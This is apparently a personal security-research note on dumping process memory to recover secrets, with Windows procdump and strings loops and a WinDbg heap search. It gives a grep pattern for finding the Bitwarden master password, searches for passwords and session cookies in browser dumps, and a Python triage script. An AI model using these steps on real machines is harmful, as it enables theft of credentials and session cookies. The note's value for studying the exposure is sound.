## Background

From my (limited) checking, it seems that whatever the user sees on the screen must be stored in memory, so dumping the memory should contain all the juicy info. I tried this on [[Extracting Clear-text Passwords from Browsers|browsers (Chrome, Edge, Firefox)]] and also on the Bitwarden password manager, and the sensitive information was found in the dumps.

The difficulty is knowing what to search for in the dump files. For example, I knew one of the passwords to look for and indeed it showed up in the Bitwarden dump when I grepped for it, but if I didn't know the password and just knew it was somewhere in the dump, I'm not sure what pattern / techniques to use to eventually pinpoint it.

However, I did seem to find a pattern for finding the Bitwarden master password:

```bash
strings ./* | grep -i 'https://identity.bitwarden.com' -A 1
```

This results in multiple hits and one of them will show the cleartext password underneath. The password is only in memory after the user has logged in, and it stays there even if the vault is locked afterwards. This shows the importance of exiting the Bitwarden process once I've finished using it.
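The same `strings | grep -i ... -A 1` triage, implemented offline in Python as an added example (it is not code from this note, from Bitwarden or from Sysinternals). It shows the "string stored right after the hit" heuristic for the Bitwarden URL, and the `password=` / `set-cookie:` searches used in the Windows section below, on a constructed dump. `SAMPLE_DUMP`, the `/connect/token` path, the password `correct horse battery staple` and every function name here are made up for the example; nothing in it comes from a real dump.

```python
"""Offline triage of a process memory dump, after the style of `strings | grep -A 1`.

Added example for this note; not Bitwarden's, Sysinternals' or the note author's
code. SAMPLE_DUMP is constructed bytes, not a real dump.
"""
from __future__ import annotations

import mmap
import re
import sys


def extract_strings(data, min_len: int = 8) -> list[tuple[int, str]]:
    """Return (offset, text) for every printable run of at least min_len characters.

    Both ASCII and UTF-16LE runs are reported (Windows processes keep a lot of
    text as UTF-16; GNU strings only shows those with `-e l`). Results are sorted
    by offset so "the string after a hit" really is the next string in memory.
    """
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), m.group().decode("ascii")) for m in ascii_run.finditer(data)]
    found += [(m.start(), m.group().decode("utf-16-le")) for m in wide_run.finditer(data)]
    found.sort()
    return found


def grep_strings(strs: list[tuple[int, str]], pattern: str, after: int = 0) -> list[list[tuple[int, str]]]:
    """Like `grep -i -A after`: each hit comes back with the strings that follow it."""
    rx = re.compile(pattern, re.IGNORECASE)
    return [strs[i:i + 1 + after] for i, (_, text) in enumerate(strs) if rx.search(text)]


# What the note greps for. The Bitwarden pattern relies on the master password
# being the string stored right after the identity-server URL.
TRIAGE_PATTERNS = {
    "password": r"password=",
    "cookie": r"set-cookie:",
    "bitwarden": r"https://identity\.bitwarden\.com",
}


def triage(data, patterns=TRIAGE_PATTERNS, after: int = 1):
    """Run every pattern over the dump's strings; returns {name: [hit groups]}."""
    strs = extract_strings(data)
    return {name: grep_strings(strs, pat, after=after) for name, pat in patterns.items()}


def bitwarden_master_candidates(data) -> list[str]:
    """The note's heuristic: the string directly after an identity.bitwarden.com hit."""
    return [grp[1][1] for grp in triage(data, after=1)["bitwarden"] if len(grp) == 2]


# Constructed stand-in for a dump: junk, an ASCII URL followed by the (made-up)
# master password, a UTF-16LE form body, a response header, and a too-short string.
SAMPLE_DUMP = (
    b"\x00" * 16 + b"MZ\x90\x00" + b"\x00" * 12
    + b"https://identity.bitwarden.com/connect/token\x00"
    + b"correct horse battery staple\x00"
    + b"\xff\xfe\x01\x02"
    + "user=alice&password=Hunter2!".encode("utf-16-le") + b"\x00\x00"
    + b"set-cookie: session=abc123def456; HttpOnly\x00"
    + b"\x7f\x80\x81" * 5 + b"short\x00"
)


def report(data) -> None:
    """Print every hit group as offset: text, hit first, following strings after it."""
    for name, groups in triage(data).items():
        for grp in groups:
            print(f"[{name}] " + "  ->  ".join(f"{off:#x}: {text}" for off, text in grp))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Real dumps are gigabytes; mmap lets re scan them without reading them into RAM.
        with open(sys.argv[1], "rb") as fh, mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ) as mm:
            report(mm)
    else:
        report(SAMPLE_DUMP)
```

Run it with a `.dmp` path to scan a real dump, or with no arguments to see the constructed sample; the UTF-16LE form body is found even though `strings` without `-e l` would miss it, which is the one thing to keep in mind when the dumps are moved from Windows to Kali.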
## Windows

Get processes for target user:

```powershell
Get-Process -IncludeUserName firefox

Handles  WS(K)   CPU(s)     Id UserName      ProcessName
-------  -----   ------     -- --------      -----------
    315  30216     0.08   2532 M-LAPTOP\Maor firefox
    361  51232    12.06   4952 M-LAPTOP\Maor firefox
    362 219496    11.30  11548 M-LAPTOP\Maor firefox
    407 216992    26.72  14772 M-LAPTOP\Maor firefox
   1632 530480 2,468.03  16468 M-LAPTOP\Maor firefox
    370  83816     0.69  16656 M-LAPTOP\Maor firefox
    200  13820     0.14  16812 M-LAPTOP\Maor firefox
    315  30520     0.08  16856 M-LAPTOP\Maor firefox
    357 130520    74.33  17128 M-LAPTOP\Maor firefox
    373 106588    70.86  17328 M-LAPTOP\Maor firefox
   5573 507732 1,947.02  17392 M-LAPTOP\Maor firefox
    376  76204    83.75  17648 M-LAPTOP\Maor firefox
    349  56800    15.50  17656 M-LAPTOP\Maor firefox
    379  30636    92.98  18276 M-LAPTOP\Maor firefox
    315  30300     0.05  19812 M-LAPTOP\Maor firefox

$procs = Get-Process firefox | foreach {$_.Id.ToString()}
# $procs = Get-Process -IncludeUserName firefox | foreach {$_.Id.ToString()}
```

Note that `-IncludeUserName` requires admin privileges.

Create a memory dump for each process (`-ma` writes a full dump including all memory; add `-accepteula` the first time procdump runs on a machine so the EULA prompt doesn't get in the way of the loop):

```powershell
foreach ($id in $procs) {procdump.exe -ma "$id" "$id.dmp"}
```

Search for sensitive data:

```powershell
foreach ($file in ls .) {strings.exe -n 20 $file | Select-String "password="}
foreach ($file in ls .) {strings.exe -n 20 $file | Select-String "set-cookie:"}
```

It's faster to copy the files to Kali and use strings + grep. `grep -a` makes grep treat the binary dump as text and print the matching lines instead of just `Binary file ... matches`, so it can be run on the dumps directly without piping through `strings`. One caveat when moving to Kali: Sysinternals `strings.exe` reports both ASCII and UTF-16 strings by default, while GNU `strings` only reports ASCII unless given `-e l` (16-bit little-endian), and a lot of what Windows processes keep in memory is UTF-16.

### WinDbg (+ OneDrive example)

[[2022-06-09_Thu]] - I went through the processes running on my machine and saw OneDrive running in the background, so I dumped its memory and started searching through its contents using `grep -ai` and noticed contents of some of my Obsidian notes.
After some more searching I understood that because the OneDrive process is always running in the background, and my Obsidian vault is inside the OneDrive folder, any time I cause OneDrive to sync something (by modifying a note or creating a new one) it ends up in memory! I then searched for recent notes that I had modified or created and found this one in its entirety in the process memory - [[Books of Secrets]]:

```text
grep -ai 'Note Created: <%+ tp' ./* -A 50
...
./12316.dmp:Note Created: <%+ tp.file.creation_date() %>
./12316.dmp-Note Last Modified: <%+ tp.file.last_modified_date() %> %%Will render in Reading mode%%
./12316.dmp-
./12316.dmp-# [[Books of Secrets]]
./12316.dmp-***
./12316.dmp-
./12316.dmp-
./12316.dmp-- [The Secrets of the Reverend Maister Alexis of Piemont](https://www.amazon.com/Secrets-Reverend-Maister-Alexis-Piemont/dp/1527881253)
./12316.dmp-- [Natural Magick](https://www.amazon.com/Natural-Magick-Magiae-naturalis-Neapolitane/dp/1468023152)
./12316.dmp-- [Lady Isabella's Secrets](https://www.amazon.com/Isabellas-Secrets-Virva-Emilia-Auvinen-ebook/dp/B07YQ12C3G)
./12316.dmp-
./12316.dmp-Science and the Secrets of Nature: Books of Secrets in Medieval and Early Modern Culture
./12316.dmp-
./12316.dmp-***
./12316.dmp-## Footnotes
./12316.dmp-Resources
./12316.dmp-
./12316.dmp-Links to this page
./12316.dmp-```dataview
./12316.dmp-LIST
./12316.dmp-FROM [[#]]
./12316.dmp-WHERE file.path != this.file.path
./12316.dmp-SORT file.name ASC
./12316.dmp-```
```

[[WinDbg]] can be used to analyze process dumps (and much more).
The following command searches the whole heap of the process for the given text and shows the addresses (`!address -f:heap` enumerates the heap regions and `-c` runs the `s -a` ASCII search on each one, with `%1` and `%2` replaced by the region's start and end addresses):

```text
!address -f:heap -c:"s -a %1 %2 \"Secrets of the Reverend Maister Alexis\""
0000011f`3fbadb9b  53 65 63 72 65 74 73 20-6f 66 20 74 68 65 20 52  Secrets of the R
0000011f`47555a90  53 65 63 72 65 74 73 20-6f 66 20 74 68 65 20 52  Secrets of the R
```

Playing around with different addresses, I was able to narrow it down using this command to get exactly the note's contents (`s -sa` lists the printable ASCII strings in the given address range):

```text
s -sa 0000011f3fbadab4 0000011f3fbaddd0
0000011f`3fbadab4  "---"
0000011f`3fbadab8  "aliases: []"
0000011f`3fbadac4  "created: "2022-06-09 20:55""
0000011f`3fbadae4  "tags: []"
0000011f`3fbadaed  "---"
0000011f`3fbadaf1  "Note Created: <%+ tp.file.creati"
0000011f`3fbadb11  "on_date() %>"
0000011f`3fbadb1e  "Note Last Modified: <%+ tp.file."
0000011f`3fbadb3e  "last_modified_date() %> %%Will r"
0000011f`3fbadb5e  "ender in Reading mode%%"
0000011f`3fbadb77  "# [[Books of Secrets]]"
0000011f`3fbadb8e  "***"
0000011f`3fbadb94  "- [The Secrets of the Reverend M"
0000011f`3fbadbb4  "aister Alexis of Piemont](https:"
0000011f`3fbadbd4  "//www.amazon.com/Secrets-Reveren"
0000011f`3fbadbf4  "d-Maister-Alexis-Piemont/dp/1527"
0000011f`3fbadc14  "881253)"
0000011f`3fbadc1c  "- [Natural Magick](https://www.a"
0000011f`3fbadc3c  "mazon.com/Natural-Magick-Magiae-"
0000011f`3fbadc5c  "naturalis-Neapolitane/dp/1468023"
0000011f`3fbadc7c  "152)"
0000011f`3fbadc81  "- [Lady Isabella's Secrets](http"
0000011f`3fbadca1  "s://www.amazon.com/Isabellas-Sec"
0000011f`3fbadcc1  "rets-Virva-Emilia-Auvinen-ebook/"
0000011f`3fbadce1  "dp/B07YQ12C3G)"
0000011f`3fbadcf1  "Science and the Secrets of Natur"
0000011f`3fbadd11  "e: Books of Secrets in Medieval "
0000011f`3fbadd31  "and Early Modern Culture"
0000011f`3fbadd4b  "***"
0000011f`3fbadd4f  "## Footnotes"
0000011f`3fbadd5c  "Resources"
0000011f`3fbadd67  "Links to this page"
0000011f`3fbadd7a  "```dataview"
0000011f`3fbadd86  "LIST"
0000011f`3fbadd8b  "FROM [[#]]"
0000011f`3fbadd96  "WHERE file.path != this.file.pat"
0000011f`3fbaddb6  "h"
0000011f`3fbaddb8  "SORT file.name ASC"
0000011f`3fbaddcb  "```"
```

After authenticating to the OneDrive Vault folder and then locking it, I made another dump and was able to locate the names of the files inside the Vault, but not the file contents.

[[2023-03-25_Sat]] - See [[Offensive Debugging]] for more info.

### Pass the Cookie

[[Pass the Cookie]]

### Extracting Clear-text Passwords from Browsers

[[Extracting Clear-text Passwords from Browsers]]

## Linux

```bash
sudo apt-get update
sudo apt-get install procdump
```

As on Windows, dumping a process that belongs to another user needs elevated rights: on Linux that means root, or ptrace access to the target as allowed by `/proc/sys/kernel/yama/ptrace_scope`.

***

#seedling - "Dumpster diving" through all available computer memory to search for sensitive data that hasn't been overwritten yet. ^ec6972

***

## Footnotes

Resources